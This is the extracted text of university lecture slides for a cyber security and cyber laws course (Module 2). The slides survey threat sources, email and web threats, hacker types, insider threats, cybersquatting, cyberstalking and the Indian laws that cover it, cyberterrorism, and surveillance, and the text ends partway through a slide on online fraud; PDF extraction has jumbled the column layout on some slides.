Amity Institute of Information Technology

CSIT371 – Cyber Security and Cyber Laws

Module 2: Cyber Security

• Sources of security threats, Motives, Target Assets
• Consequence of threats, E-mail threats, Web threats, Hacking, Intruders, Insider threats
• Cyber Squatting, Cyber Stalking, Crime of deception, Content Oriented Online Crime,
Malicious Software use and detection
• Cyber Terrorism, Information warfare and surveillance, Virtual Crime, Online Frauds
• Identity Theft and Intellectual property theft, Network threats-Worms, Virus, Spam’s, Ad-
ware, Spyware
• Trojans and convert Channels, Backdoors, Bots, IP spoofing, ARP spoofing
• Session hijacking, Sabotage, phishing, Zombie/Zombie Drone.
Dr. Partha Sarathi Chakraborty
AIIT, Amity University Uttar Pradesh Noida

The slides are used for education purpose. Not support or used for
 Amity Institute of Information Technology

Cybersecurity Threats

CSIT371 Cyber Security and Cyber Laws - Module 2 2

 Amity Institute of Information Technology

Cyber Attack

CSIT371 Cyber Security and Cyber Laws - Module 2 3

 Amity Institute of Information Technology

Sources of Security Threats

CSIT371 Cyber Security and Cyber Laws - Module 2 4

 Amity Institute of Information Technology

Sources of Security Threats

• Systems resources
• Hardware, software (OS, apps), data (users, system, database),
communication facilities and network (LAN, bridges, routers, …)
• Our concern: vulnerability of these resources (corrupted,
unavailable, leaky)
• Threats exploit vulnerabilities
• Attack is a threat that is accrued out
• Active or passive; from inside or from outside
• Countermeasures: actions taken to prevent, detect,
recover and minimize risks
CSIT371 Cyber Security and Cyber Laws - Module 2 5
 Amity Institute of Information Technology

Se
cur
ity
Ter
mi
nol
og
y
CSIT371 Cyber Security and Cyber Laws - Module 2 6
 Amity Institute of Information Technology

Sources of Security Threats: Cyber Threat

Actors

CSIT371 Cyber Security and Cyber Laws - Module 2 7

 Amity Institute of Information Technology

Motives
• Corporate Espionage, Business Disruption, or Financial Gain.
• Whatever the motivation, cybersecurity threats have become pervasive and
continue to upend every facet of the digital realm.
• Beyond causing severe financial damage, cyberattacks can lead to regulatory
penalties, lawsuits, reputational damage, and business continuity disruptions.
• No business and IT organization are safe in the present cyber world. As
cybercriminals increasingly rely on sophisticated technologies to perform
malicious attacks.
• Rapid adoption of emerging technologies, including AI, the Internet of Things (IoT),
and cloud computing, have added new cyber threats for organizations while adding

“
complexity to existing risks.
According to Verizon’s 2020 Data Breach Investigations Report (DBIR),
86% of cybersecurity breaches were financially motivated, and 10% were
motivated by espionage.
CSIT371 Cyber Security and Cyber Laws - Module 2 8
 Amity Institute of Information Technology

Motives

CSIT371 Cyber Security and Cyber Laws - Module 2 9

 Amity Institute of Information Technology

Motives

CSIT371 Cyber Security and Cyber Laws - Module 2 10

 Amity Institute of Information Technology

Target Assets
• Cyber threat actors conduct malicious activity against anything connected to or residing on
the Internet, including devices, information, financial resources, opinions, and reputations:

Informati
Devices
on

Financial
Resource Opinions Reputatio
s ns

CSIT371 Cyber Security and Cyber Laws - Module 2 11

 Amity Institute of Information Technology

Examples of Threats

CSIT371 Cyber Security and Cyber Laws - Module 2 12

 Amity Institute of Information Technology

Security Concepts and Relationships

CSIT371 Cyber Security and Cyber Laws - Module 2 13

 Amity Institute of Information Technology

Threat consequences
Unauthorized Disruption: threat
Deception: threat Usurpation:
disclosure: threat to integrity and
to integrity threat to integrity
to confidentiality availability
• Exposure • Masquerade, • Incapacitation • Misappropriation
(release data), falsification (alter (destruction), (theft of service),
interception, data), corruption misuse (hacker
inference, repudiation (backdoor logic), gaining
intrusion obstruction (infer unauthorized
with access)
communication,
overload a line)

CSIT371 Cyber Security and Cyber Laws - Module 2 14

 Amity Institute of Information Technology

consequences
Threat

CSIT371 Cyber Security and Cyber Laws - Module 2 15

 Amity Institute of Information Technology

E-mail Threats

SPAM MALWARE BUSINESS EMAIL

PHISHING
COMPROMISE
(BEC)
Spam email is any Phishing is sending Malware refers to any BEC is a carefully
unsolicited and fraudulent intrusive software planned and
unwanted junk email communications that developed by researched spoofing
and is often sent for appear to be from cybercriminals to attack that
commercial purposes. reputable sources, usually steal data and strategically selects
When spam is sent out through email or texting. damage or destroy and impersonates a
in massive volume by The end goal is to steal computers and company, executive,
botnets to an money or sensitive data computer systems. vendor, or supplier.
indiscriminate recipient like login information or to Common forms of The end goal is
list, the goal is most install malware or malware is often to trick
likely to spread malware ransomware on the ransomware. Recent someone into
by infecting computer victim's machine. Phishing malware attacks have sending money over
networks, for business is a very common
CSIT371 Cyber Security and Cyber Laws - Module 2
exfiltrated data in the wire or granting 16

E-mail Threats
Malicious
Links
A malicious link is embedded in an
email; it leads to a site that will attack a
computer or a network. Often, the attack
happens before the person can even
click away from the site. This type of
attack is most commonly a link sent
from a spoofed account—the email
address or name appears to be that of a
friend or business associate. Often it will
contain only the link, or it will say
something like, “I found this for you…”
CSIT371 Cyber Security and Cyber Laws - Module 2
Amity Institute of Information Technology
Zero-Day
Attacks
In a zero-day attack an attacker uses an
unknown threat (yet to be discovered by
anti-virus vendors, firewalls, and other
systems). Email is the most common
form of delivery of these types of attacks
through malicious links or attachments.
Once someone clicks the link or
attachment in the email, the malicious
code installs itself and exploits the
unknown vulnerability.
17
 Amity Institute of Information Technology

Business
Email
Compromise

CSIT371 Cyber Security and Cyber Laws - Module 2 https://www.fbi.gov/news/stories/business-e-mail-compromise-on-the-rise 18

 Amity Institute of Information Technology

Web Threats
• Web threats are malicious activities or vulnerabilities that exploit the internet or web-based
systems to compromise the security, privacy, or functionality of users, organizations, or
systems.
• These threats target websites, web applications, browsers, and users, often leading to data
breaches, financial losses, or reputational damage.
• Common Types of Web Threats: Phishing, Malware, SQL Injection (SQLi), Cross-Site
Scripting (XSS), Cross-Site Request Forgery (CSRF), Man-in-the-Middle (MITM) Attacks, Denial-
of-Service (DoS) and Distributed DoS (DDoS) Attacks, Session Hijacking, Unsecured APIs,
Ransomware via Websites
• Basic components to any web threat:
• Threat motives give an intentional threat agent a reason or goal to cause harm. Some threat
agents don’t act intentionally or act autonomously and may, therefore, be absent of motive.
• Threat agents are anything or anyone that can negatively impact — with the internet either as a
threat vector or a target itself.
• Vulnerabilities include any human behavior weakness, technology systems, or other resources
that can lead to a damaging exploit or incident.
• Threat outcomes are the negative results of a threat agent acting against one or more
vulnerabilities.
CSIT371 Cyber Security and Cyber Laws - Module 2 19
 Amity Institute of Information Technology

Web Threats (contd..)

• Types of threat agents • Mitigate Web Threats
• Non-human agents: Examples include • Secure Web Applications: Implement robust
malicious code (viruses, malware, worms, input validation to prevent SQLi and XSS. Use
scripts), natural disasters (weather, geological), secure authentication mechanisms and
utility failure (electrical, telecom), technology encrypted communications (e.g., HTTPS).
failure (hardware, software), and physical • Regular Security Audits: Conduct
hazards (heat, water, impact). vulnerability assessments and penetration
• Intentional human agents: Based on testing.
malicious intent. Can be internal (employees, • Web Security Tools: Deploy firewalls,
contractors, family, friends, acquaintances) and intrusion detection systems (IDS), and anti-
external (professional and amateur hackers, malware solutions.
nation-state actors and agencies, competitor • Educate Users: Train users to recognize
corporations) phishing emails, avoid suspicious links, and use
• Accidental human agents: Based on human strong passwords.
error. Similar to intentional threats, this type • Update and Patch Regularly: Keep software,
can include internal and external agents. frameworks, and plugins up-to-date to address
• Negligence-based human agents: Based on known vulnerabilities.
careless behaviors or safety oversights. Again, • Implement Strong Access Controls: Enforce
this category can also include internal and role-based access and use multi-factor
external agents. authentication.

CSIT371 Cyber Security and Cyber Laws - Module 2 20

 Amity Institute of Information Technology

Examples of web threats

Here are some of the more well-known examples:
• WannaCry ransomware
• In May 2017, the WannaCry ransomware spread to many networks and locked
down countless Windows PCs. This threat was particularly dangerous because of
its worm functionality, allowing it to spread completely autonomously. WannaCry
exploited a native communication language within Windows to spread this
malicious code.
• Celebrity iCloud phishing
• A spear-phishing attack led to the breach of numerous celebrity iCloud accounts.
This breach ultimately resulted in the unauthorized leak of countless private
photos from these accounts. While the attacker was eventually located and
prosecuted, the victims are still suffering from their intimate photos being made
public — without their permission. This has become one of the most well-known
phishing attacks of the decade.
https://www.kaspersky.com/resource-center/threats/ransomware-wannacry
CSIT371 Cyber Security and Cyber Laws - Module 2
https://www.bbc.com/news/technology-29237469 21
 Amity Institute of Information Technology

Hacking
• A hacker can use their skills to explore and improve
technology systems.
• Hackers are often considered "computer criminals" who use
their programming skills to hack or steal information.
• They may use automated programs to compromise a
computer's security system.
• Hackers are typically very knowledgeable about technology
and security.
• Hacking can have a significant impact, such as financial loss
or costly repairs to computer systems.

CSIT371 Cyber Security and Cyber Laws - Module 2 22

 Amity Institute of Information Technology

Types of Hackers
• White Hat Hackers (Ethical Hackers): Work legally and ethically to identify vulnerabilities and help
organizations improve security.
• Example: Penetration testers who simulate attacks to strengthen a system's defenses.
• Black Hat Hackers (Malicious Hackers): Exploit vulnerabilities without permission for personal or
financial gain, or to cause damage.
• Example: Hackers who steal sensitive data to sell on the dark web.
• Grey Hat Hackers: Operate between ethical and unethical boundaries; may exploit vulnerabilities
without malicious intent but without explicit permission.
• Example: Reporting security flaws in a system they accessed without authorization.
• Script Kiddies: Inexperienced individuals who use pre-made tools and scripts to perform hacking
without a deep understanding of the techniques involved.
• Example: Running a DDoS tool downloaded from the internet.
• Hacktivists: Hackers motivated by political, social, or ideological goals, using hacking as a form of
protest or activism.
• Example: Defacing websites to highlight a political issue.
• State-Sponsored Hackers: Operate under government directives to carry out cyber espionage,
sabotage, or attacks against other nations.
• Example: Cyberattacks targeting critical infrastructure of rival countries.
CSIT371 Cyber Security and Cyber Laws - Module 2 23
 Amity Institute of Information Technology

Impact and Prevention

• Impacts of Hacking
• For Individuals: Identity theft, financial losses, privacy breaches, and emotional distress.
• For Organizations: Financial losses, reputational damage, legal liabilities, and operational
disruptions.
• For Governments: National security threats, espionage, and disruption of critical infrastructure.
• Ethical Hacking and Its Role
• Ethical hacking involves using hacking techniques with permission to identify and mitigate
vulnerabilities.
• It plays a crucial role in: Enhancing cybersecurity, Protecting sensitive data, Preventing
cyberattacks.
• Preventing Hacking
• Strong Passwords and Multi-Factor Authentication: Use complex passwords and add layers
of security to logins.
• Regular Software Updates: Patch vulnerabilities by updating systems and applications.
• Firewalls and Antivirus: Block unauthorized access and detect malware.
• Educating Users: Train users to recognize phishing and avoid suspicious links or attachments.
• Monitoring and Auditing: Continuously monitor systems for unusual activity and perform
regular security audits.
CSIT371 Cyber Security and Cyber Laws - Module 2 24
 Amity Institute of Information Technology

Intruders
• An "intruder" is an external attacker who attempts to gain unauthorized access to
a system from outside the organization, typically without legitimate credentials.
• Example: Attempting to breach a company's network by exploiting a vulnerability
in their website.
• Motivations of Intruders: Financial Gain, Espionage, Revenge or Vandalism,
Curiosity or Challenge, Hacktivism, Terrorism.
• Types of Intruders
• External Intruders: Individuals or systems outside the organization who attempt to breach
security barriers. Example: Hackers trying to infiltrate a company's network.
• Internal Intruders: Trusted insiders, such as employees or contractors, who misuse their
access to exploit systems. Example: An employee stealing sensitive customer data.
• Automated Intruders (Bots): Programs or scripts designed to perform unauthorized
actions, such as scanning for vulnerabilities or launching attacks. Example: Botnets
performing Distributed Denial-of-Service (DDoS) attacks.

CSIT371 Cyber Security and Cyber Laws - Module 2 25


Intruders (Contd..)
Indicators of Intrusion
• Unusual Network Activity: High traffic from
unknown sources or irregular data patterns.
• Unauthorized Access Attempts: Multiple
failed login attempts or logins from
unfamiliar locations.
• Changes in Files or Systems: Unexplained
modifications, deletions, or the presence of
unknown files.
• System Slowdowns: Reduced performance
due to unauthorized processes consuming
resources.
• Unexpected Alerts: Warnings from security
software or logs indicating suspicious
activity.
CSIT371 Cyber Security and Cyber Laws - Module 2
Amity Institute of Information Technology
Preventing Intrusions
• Implement Strong Authentication: Use multi-
factor authentication (MFA) and robust
password policies.
• Regularly Update and Patch Systems: Keep
software up-to-date to close security
vulnerabilities.
• Install Security Solutions: Use firewalls,
intrusion detection systems (IDS), and
antivirus software.
• Monitor and Audit: Continuously monitor
networks and systems for suspicious
activities.
• Limit Access: Follow the principle of least
privilege by granting users only the access
they need. 26
 Amity Institute of Information Technology

Insider Threats
An insider threat is a security risk that comes from someone within an organization who has
access to sensitive information or privileged accounts and misuses it. Insider threats can be
intentional or unintentional, and can come from a variety of people, including current or former
employees, contractors, vendors, and interns

CSIT371 Cyber Security and Cyber Laws - Module 2 27

 Amity Institute of Information Technology

Insider Threats

CSIT371 Cyber Security and Cyber Laws - Module 2 28

 Amity Institute of Information Technology

Difficult to Detect
• Insider threats are difficult to detect because traditional
security measures are often ineffective against them.
Some signs of an insider threat include:
• Unusual access times, such as signing into the network at odd
hours
• Unusual spikes in network traffic
• Accessing resources that are not relevant to their job function
• Using unauthorized devices, such as USB drives
• Emailing sensitive information outside the organization
• Excessive spikes in data downloads
• Using tools like Airdrop to transfer files
CSIT371 Cyber Security and Cyber Laws - Module 2 29
 Amity Institute of Information Technology

Insider Threats Example

Airlines Cash App

Impact: Data Impact: Leak Impact: Massive Impact: Triple data Impact: Code
Impact: Intellectual Impact: Data theft
exposure customer data data breach breach repositories stolen
property theft

Source: Cloud Source: Malicious Source: Malicious Source: Social

Source: Malicious Source: Malicious Source: Third-party
misconfiguration by activity by a former activity by former engineering attacks
insider activity for insider actions vendor compromise
a system employee (former employee) employees on employees
administrator personal gain

Popular Examples

CSIT371 Cyber Security and Cyber Laws - Module 2 30

 Amity Institute of Information Technology

Cyber Squatting
• Cybersquatting refers to the act of registering or using a
domain name to profit from a trademark, corporate
name, or personal name of an individual. Types of Cyber
Squatting
Reverse
Cyber
Squatting

Typosquattin
Identit g
y
Name
theft
jackin
g
CSIT371 Cyber Security and Cyber Laws - Module 2 31
 Amity Institute of Information Technology

Types of Cyber Squatting

Typosquattin Typosquatting focuses on altering a domain's original spelling by introducing or deleting
numbers, letters, or periods. It also entails changing the sequence of the letters or words inside a
g domain. In essence, typosquatting refers to taking advantage of potential typos.

An attacker assuming the online persona of a legitimate business by registering a domain that
Identity looks identical to the targets. Users trying to reach the company's site via the web can
accidentally access the phishing domain. Domain squatting involving identity theft also occurs
theft when a hacker acquires a previously registered domain whose owner has let the registration
lapse.

Name It occurs when a squatter creates a false website using the real name of a famous person. This
is frequently the situation when, for example, domains or, more maliciously, social media profiles
jacking are registered in the names of celebrities by cybersquatters. It may not always be possible to
prove that name jacking was done on purpose, making prosecution of the crime challenging.

Reverse domain name hijacking (RDNH), also known as reverse cybersquatting, is a technique that is,
Reverse in some ways, the opposite of cybersquatting. While purchasing a domain name that contains a
trademark with the goal of making money off that trademark is cybersquatting, reverse domain
Cyber hijacking is a little different. It happens when a person or business makes a false claim that she, he, or
Squatting it owns a trademark and then takes unjustified steps to take your legitimate domain name away.
CSIT371 Cyber Security and Cyber Laws - Module 2 32
 Amity Institute of Information Technology

CSIT371 Cyber Security and Cyber Laws - Module 2 33

 Amity Institute of Information Technology

Cyber Stalking
• Cyberstalking refers to the use of the internet, social media, email, or other
digital technologies to harass, threaten, or intimidate an individual.
• Unlike traditional stalking, which involves physical proximity, cyberstalking
is carried out online, making it easier for perpetrators to target victims
anonymously and from a distance.
• Key Characteristics of Cyberstalking
• Persistent and Repeated Behavior: The stalker repeatedly contacts or monitors
the victim despite being asked to stop.
• Harassment or Threats: Messages or actions that create fear, distress, or
discomfort for the victim.
• Use of Digital Platforms: Involves emails, text messages, social media, forums, or
even hacking into personal accounts.
• Anonymity: Cyberstalkers often hide their identity, making it difficult to trace them.

CSIT371 Cyber Security and Cyber Laws - Module 2 34


Cyberstalking
Common
Tactics Used in Cyberstalking
• Unwanted Communication: Sending
excessive emails, messages, or texts to the
victim.
• Social Media Surveillance: Constantly
monitoring the victim’s online activities,
posts, and interactions.
• Impersonation: Creating fake profiles to
interact with the victim or damage their
reputation.
• Doxxing: Publicly revealing the victim’s
personal information, such as their address
or phone number.
• Threats and Intimidation: Sending messages
or posts that threaten harm to the victim or
their loved ones.
• Hacking and Spying: Gaining unauthorized
CSIT371 Cyber Security and Cyber Laws - Module 2
Amity Institute of Information Technology
Impacts of Cyberstalking
• Emotional and Psychological Distress: Anxiety,
depression, fear, and loss of a sense of safety.
• Social Isolation: Victims may avoid social
media or online platforms to escape
harassment.
• Reputational Damage: False information or
impersonation can harm the victim's personal
or professional reputation.
• Physical Threats: Cyberstalking can escalate
to physical stalking or violence in extreme
cases.
• Financial Loss: Victims may incur costs to
enhance digital security or recover from
hacking incidents.
35
 Amity Institute of Information Technology

Legal Protections against Cyberstalking in

India
• Cyberstalking is a punishable offense in India, and there are several laws that
protect against it, including:
• Section 354 (D) of the IPC: Punishes stalking with up to three years in prison and a
fine on the first conviction
• Section 507 of the IPC: Punishes criminal intimidation by anonymous communication
• Section 509 of the IPC: Punishes actions that intend to insult a woman's modesty,
including lewd comments, gestures, or images sent over the internet
• Section 67 of the IT Act: Punishes sending or posting obscene content to a victim via
electronic media with up to five years in jail and a fine of up to one lakh rupees
• Section 66C of the IT Act: Punishes identity theft with up to three years in prison and
a fine of up to one lakh rupees
• Section 66E of the IT Act: Deals with the violation of a person's privacy

CSIT371 Cyber Security and Cyber Laws - Module 2 36

 Amity Institute of Information Technology

Crime of Deception
• Deception is a legal concept that refers to the act of intentionally misleading
someone to gain an unfair advantage or cause harm. It can be a criminal offense or
grounds for legal action in contract law.
• In criminal law, deception can include:
• Obtaining property by deception
• Obtaining a money transfer by deception
• Obtaining pecuniary advantage by deception
• Procuring the execution of a valuable security by deception
• Obtaining services by deception
• Evasion of liability by deception
• In contract law, deception is known as misrepresentation or fraudulent
misrepresentation.
• In India, Section 415 of the Code of India states that anyone who fraudulently or
dishonestly deceives a person to deliver property or consent to the retention of
property is guilty of a crime.
CSIT371 Cyber Security and Cyber Laws - Module 2 37
 Amity Institute of Information Technology

Crime of Deception (Cyber Crime)

• Cyber deception and theft is a type of cybercrime that involves a perpetrator gaining a victim's trust
through a computer system and then exploiting them fraudulently. Cybercriminals often use a
combination of real and false information to deceive their victims.
• Cybercrime is a broad category of criminal activities that use digital devices and networks to commit
various crimes, including:
• Fraud: Cybercriminals may use computers to commit fraud, such as credit card fraud or impersonation.
• Identity theft: Cybercriminals may steal a victim's identity by using their electronic signature, password, or other
unique identification feature.
• Data breaches: Cybercriminals may exploit vulnerabilities in computer systems and networks to steal sensitive
information.
• Malware: Cybercriminals may infect computers with malware to damage devices, steal data, or stop users from
using a website or network.
• Denial-of-Service (DoS) attacks: Cybercriminals may use computers to prevent a business from providing a
software service to its customers.
• To report a cybercrime complaint, you can use the Cyber Crime Portal. You can also contact the
platform provider if you are being cyberbullied on a platform like Facebook or Instagram. If you feel
threatened, you should call the police immediately.
CSIT371 Cyber Security and Cyber Laws - Module 2 38
 Amity Institute of Information Technology

Content Oriented Online Crime

(COC)
• It refers to illegal or harmful activities conducted through the creation,
sharing, or manipulation of digital content. This type of crime involves
using online platforms to disseminate material that violates legal,
ethical, or moral boundaries, targeting individuals, groups, or societies.
• Key Characteristics
• Content as the Medium: The primary weapon is digital content, such as text,
images, videos, or audio files.
• Wide Reach: The internet enables rapid and extensive distribution, often
targeting global audiences.
• Anonymity: Perpetrators can mask their identities using encryption, pseudonyms,
and the dark web.
• Psychological Impact: Crimes often aim to manipulate emotions, beliefs, or
behaviors.

CSIT371 Cyber Security and Cyber Laws - Module 2 39

 Amity Institute of Information Technology

Types of COC
Cyberbullying Child
Cyber Fake News and
Hate Speech and Exploitation
Defamation Misinformation
Harassment Material
• Publishing • Sharing • Using online • Creation, • Disseminating
false or content that platforms to distribution, or false or
defamatory incites intimidate, possession of misleading
statements violence, threaten, or content information to
online to harm discrimination, humiliate involving the manipulate
an individual's or hostility individuals. exploitation of public opinion
or against • Example: minors. or cause
organization's specific Sending • Example: harm.
reputation. groups based abusive Hosting or • Example:
• Example: on race, messages or sharing illegal Spreading
Posting false religion, sharing content on unverified
allegations on ethnicity, embarrassing file-sharing health-related
social media gender, etc. photos without platforms. claims during
about a public • Example: Viral consent. a pandemic.
figure. posts
promoting
xenophobia.
CSIT371 Cyber Security and Cyber Laws - Module 2 40
 Amity Institute of Information Technology

Types of COC
Online Gaming
Intellectual Online Scams and
Revenge Porn and Forum
Property Theft Radicalization Fraud
Abuse
• Unauthorized • Distributing • Sharing • Deceptive • Using online
use, extremist explicit content aimed gaming
reproduction, propaganda to images or at tricking platforms or
or distribution recruit videos of individuals forums to
of copyrighted individuals someone into financial spread toxic,
material. into terrorist without their loss. illegal, or
• Example: organizations. consent to • Example: Fake harmful
Pirated • Example: harm their investment content.
movies, Using reputation or schemes • Example:
software, or encrypted privacy. advertised Sharing links
books messaging • Example: through to illicit
uploaded to apps to Uploading fraudulent material in
torrent circulate private photos websites. gaming chats.
websites. ideological to social
content. media or adult
websites.

CSIT371 Cyber Security and Cyber Laws - Module 2 41

 Amity Institute of Information Technology

Impacts of COC
Economic Legal and Technological
Social Impact:
Impact: Ethical Impact: Impact:
• Erosion of • Losses from • Strain on law • Increased
trust in online scams, fraud, enforcement demand for AI-
platforms. and agencies to driven content
• Psychological intellectual track and moderation
trauma for property theft. prosecute tools.
victims. • Financial offenders. • Emergence of
• Polarization burden on • Ethical counter-
and societal companies to dilemmas technologies
division address about like deepfake
through hate cybersecurity censorship detection.
speech and and content and freedom
fake news. moderation. of speech.

CSIT371 Cyber Security and Cyber Laws - Module 2 42

 Amity Institute of Information Technology

Challenges in Combating COC

Volume and Speed:
Global Jurisdiction:
Large volumes of Anonymity:
Crimes often cross
content are created and Perpetrators use VPNs,
national boundaries,
shared rapidly, encryption, and the dark
complicating
overwhelming web to avoid detection.
enforcement.
monitoring systems.

Balancing Freedom
Evolving
and Security:
Technologies:
Governments must
Sophisticated tools like
balance the need for
deepfakes make it
content regulation with
harder to identify
protecting freedom of
manipulated content.
expression.

CSIT371 Cyber Security and Cyber Laws - Module 2 43

 Amity Institute of Information Technology

Prevention and Mitigation Strategies

(COC)

Content Legislation: Awareness Technological International

Moderation: • Enforcing laws against Campaigns: Solutions: Cooperation:
• Platforms employ AI defamation, • Educating users about • Using machine learning • Cross-border
and human moderators cyberbullying, and recognizing and models to detect collaboration for
to detect and remove exploitation. reporting harmful deepfakes or fake investigation and
harmful content. • Example: GDPR in the content. news. prosecution.
• Example: Social media EU to regulate data • Example: Anti- • Example: Tools like • Example: Interpol’s
algorithms flagging protection and online cyberbullying Google’s Fact Check efforts against online
hate speech. privacy. initiatives in schools. Explorer. child exploitation.

Content-oriented online crime represents a significant challenge in the digital era, affecting individuals, organizations, and
societies. Effective countermeasures require a combination of technological innovation, robust legislation, and public
awareness, all while maintaining a balance between security and freedom of expression.
CSIT371 Cyber Security and Cyber Laws - Module 2 44
 Amity Institute of Information Technology

Malicious Software use and

Detection
• "Malicious software," often called "malware," refers to any
program designed to intentionally harm a computer
system or network.
• “Malware detection" is the process of identifying and
stopping such malicious software using specialized
security tools like antivirus software, aiming to protect
systems from damage caused by viruses, Trojans,
ransomware, and other harmful programs.
• Essentially, cybercriminals use malware to steal personal
information, disrupt operations, or extort money, while
security software is designed to detect and remove it.
CSIT371 Cyber Security and Cyber Laws - Module 2 45
 Amity Institute of Information Technology

Cyber Terrorism
• Cyberterrorism is the use of the Internet to conduct violent acts that result in, or
threaten, the loss of life or significant bodily harm, in order to achieve political
or ideological gains through threat or intimidation.
• Emerging alongside the development of information technology, cyberterrorism
involves acts of deliberate, large-scale disruption of computer networks,
especially of personal computers attached to the Internet by means of tools
such as computer viruses, computer worms, phishing, malicious software,
hardware methods, and programming scripts can all be forms of internet
terrorism.
• Cyberterrorism can be also defined as the intentional use of computers,
networks, and public internet to cause destruction and harm for personal
objectives.
• Experienced cyberterrorists, who are very skilled in terms of hacking can cause massive
damage to government systems and might leave a country in fear of further attacks.
• The objectives of such terrorists may be political or ideological since this can be
considered a form of terror.
CSIT371 Cyber Security and Cyber Laws - Module 2 46

Cyber Terrorism
Characteristics of Cyber Terrorism
1.Digital Nature: Cyber terrorism operates
in the virtual domain, targeting computer
systems, networks, and information.
2.Anonymity: Attackers often operate
anonymously, making it challenging to
attribute the attacks to specific
individuals or groups.
3.Low Cost and High Impact: Cyber
attacks are relatively inexpensive to
execute but can cause significant
disruption and economic loss.
4.Global Reach: Cyber terrorism
transcends geographic boundaries,
affecting victims worldwide.
CSIT371 Cyber Security and Cyber Laws - Module 2
Amity Institute of Information Technology
Key Objectives
• Disruption: Paralyzing critical
infrastructures such as power grids, financial
systems, healthcare, transportation, and
communication networks.
• Psychological Impact: Instilling fear and
uncertainty among populations.
• Espionage: Stealing sensitive information to
undermine national security or gain a
strategic advantage.
• Economic Damage: Causing financial loss
through attacks like ransomware or denial-of-
service (DoS) operations.
• Propaganda: Spreading extremist ideologies
and recruiting members via online platforms.
47

Cyber Terrorism
Examples of Cyber Terrorism
1.Stuxnet (2010): A sophisticated
malware allegedly developed to disrupt
Iran's nuclear program by targeting its
industrial control systems.
2.WannaCry Ransomware Attack
(2017): A global ransomware attack that
crippled businesses, hospitals, and
government services.
3.Power Grid Attacks: Cyber terrorists
have targeted power grids in Ukraine
(2015), leading to widespread blackouts.
4.Cyber Espionage: Persistent threats
from state-backed or independent groups
targeting sensitive government data.
CSIT371 Cyber Security and Cyber Laws - Module 2
Amity Institute of Information Technology
Challenges in Countering Cyber
Terrorism
1.Attribution: Difficulty in identifying
perpetrators due to anonymizing
technologies.
2.Jurisdictional Issues: Cyber crimes
often cross national boundaries,
complicating enforcement.
3.Technological Sophistication:
Rapid evolution of cyber attack
techniques outpaces defensive
capabilities.
4.Lack of Awareness: Limited public
understanding of cyber security risks.
48
 Amity Institute of Information Technology

Cyber Terrorism
Impact of Cyber Terrorism Preventive Measures
• Economic Loss: Billions of dollars lost 1.Strengthening Cybersecurity
annually due to data breaches, Infrastructure: Robust firewalls,
ransomware payments, and recovery intrusion detection systems, and
encryption protocols.
costs.
2.International Cooperation: Cross-
• National Security: Threats to defense, border collaboration to address the global
intelligence, and critical infrastructures. nature of cyber threats.
• Social Chaos: Disruption of essential 3.Public Awareness Campaigns:
services like healthcare, banking, and Educating users about safe online
transportation. practices and the risks of cyber terrorism.
• Psychological Fear: Public fear and 4.Legislative Frameworks: Enacting and
loss of trust in digital systems. enforcing laws against cyber terrorism.
5.Incident Response Teams: Establishing
rapid response mechanisms to mitigate
CSIT371 Cyber Security and Cyber Laws - Module 2 attacks. 49
 Amity Institute of Information Technology

Information Warfare and

Surveillance
• Information Warfare refers to the use and management of information and
communication technologies to gain a competitive edge over adversaries in a
conflict.
• It encompasses a range of activities designed to influence, disrupt, or manipulate
the decision-making capabilities of opponents while protecting one's own
information systems and strategies.
• Objectives of Information Warfare
• Gain intelligence superiority.
• Influence public opinion and morale.
• Disrupt enemy communication and decision-making.
• Protect critical information assets.
• Real-World Examples
• Russia-Ukraine Conflict (2022): Extensive use of cyber attacks and disinformation
campaigns by both sides.
• 2016 U.S. Elections: Alleged interference through misinformation and hacking.

CSIT371 Cyber Security and Cyber Laws - Module 2 50

 Amity Institute of Information Technology

Information Warfare and Surveillance

Key Components of Information
Warfare
1 2 3 4 5

Psychological
Operations (PsyOps):
Disseminating
information to influence
the emotions, motives, or
reasoning of target
audiences.
Example: Propaganda
campaigns to demoralize
enemy forces.
Electronic Warfare Cyber Warfare: Disinformation and Command and Control
(EW): Employing cyber tools to Misinformation: Warfare (C2W):
Using electromagnetic attack an adversary's Spreading false or Targeting decision-
spectrum operations to information systems, misleading information to making structures to
disrupt or degrade steal sensitive data, or confuse or mislead paralyze an enemy's
enemy communication disrupt operations. opponents. ability to act effectively.
and radar systems. Example: Hacking into Example: Fake news Example: Disrupting
Example: Jamming military databases to campaigns during enemy communication
enemy communication gather intelligence. elections to sway public networks.
signals during combat. opinion.

CSIT371 Cyber Security and Cyber Laws - Module 2 51

 Amity Institute of Information Technology

Surveillance
• Surveillance involves the systematic monitoring of individuals, groups, or
systems to collect information for security, intelligence, or strategic purposes. It
is a key component of intelligence gathering in both military and civilian
contexts.
• Purpose of Surveillance
• Prevent terrorist activities.
• Ensure national security.
• Monitor dissent or political movements.
• Enforce law and order.
• Track and counter cyber crimes.
• Challenges and Ethical Concerns
• Privacy Invasion: Mass surveillance often leads to concerns about individual freedoms and
privacy.
• Data Security: Collected data can be vulnerable to breaches.
• Abuse of Power: Surveillance tools can be misused by authoritarian regimes to suppress
dissent.
CSIT371 Cyber Security and Cyber Laws - Module 2 52
•
 Amity Institute of Information Technology

Types of Surveillance

Electronic Surveillance:
Monitoring digital
communications, including
emails, phone calls, and
internet activity.
Example: Governments using
wiretapping to track criminal
activities.
Video Surveillance:
Using CCTV cameras or drones
to observe physical spaces.
Example: Smart cities employing
camera networks for public
safety.
Mass Data Collection:
Aggregating and analyzing large
volumes of data from social
media, financial transactions, or
location tracking.
Example: Social media
monitoring during protests.
Signals Intelligence Human
(SIGINT): Intelligence
Intercepting communications (HUMINT):
and electronic signals for Relying on
intelligence purposes. informants or
Example: Monitoring enemy
undercover agents to
radio communications in
wartime.
gather information.
Example: Espionage
activities.

In modern conflicts, Information Warfare and Surveillance are closely linked. Surveillance provides the intelligence
needed to plan and execute Information Warfare strategies, while Information Warfare creates conditions that justify
enhanced surveillance. Together, they form a feedback loop in which each strengthens the other.

CSIT371 Cyber Security and Cyber Laws - Module 2 53

 Amity Institute of Information Technology

Virtual Crime
• Virtual crime, also known as cybercrime, is illegal
activity that takes place on the internet. Some examples
of virtual crimes include
• Identity theft
• Cyber stalking
• Ransomware
• Phishing
• Malware
• Intellectual property crimes

CSIT371 Cyber Security and Cyber Laws - Module 2 54

 Amity Institute of Information Technology

Online Frauds
• It refers to fraudulent activities committed
through the internet, where criminals use
deceptive tactics to steal personal information,
money, or access to sensitive data from
victims, often through phishing emails, fake
websites, or malicious software, with common
types including identity theft, credit card fraud,
and business email compromise (BEC). Common
• Online frauds Methods: targets:
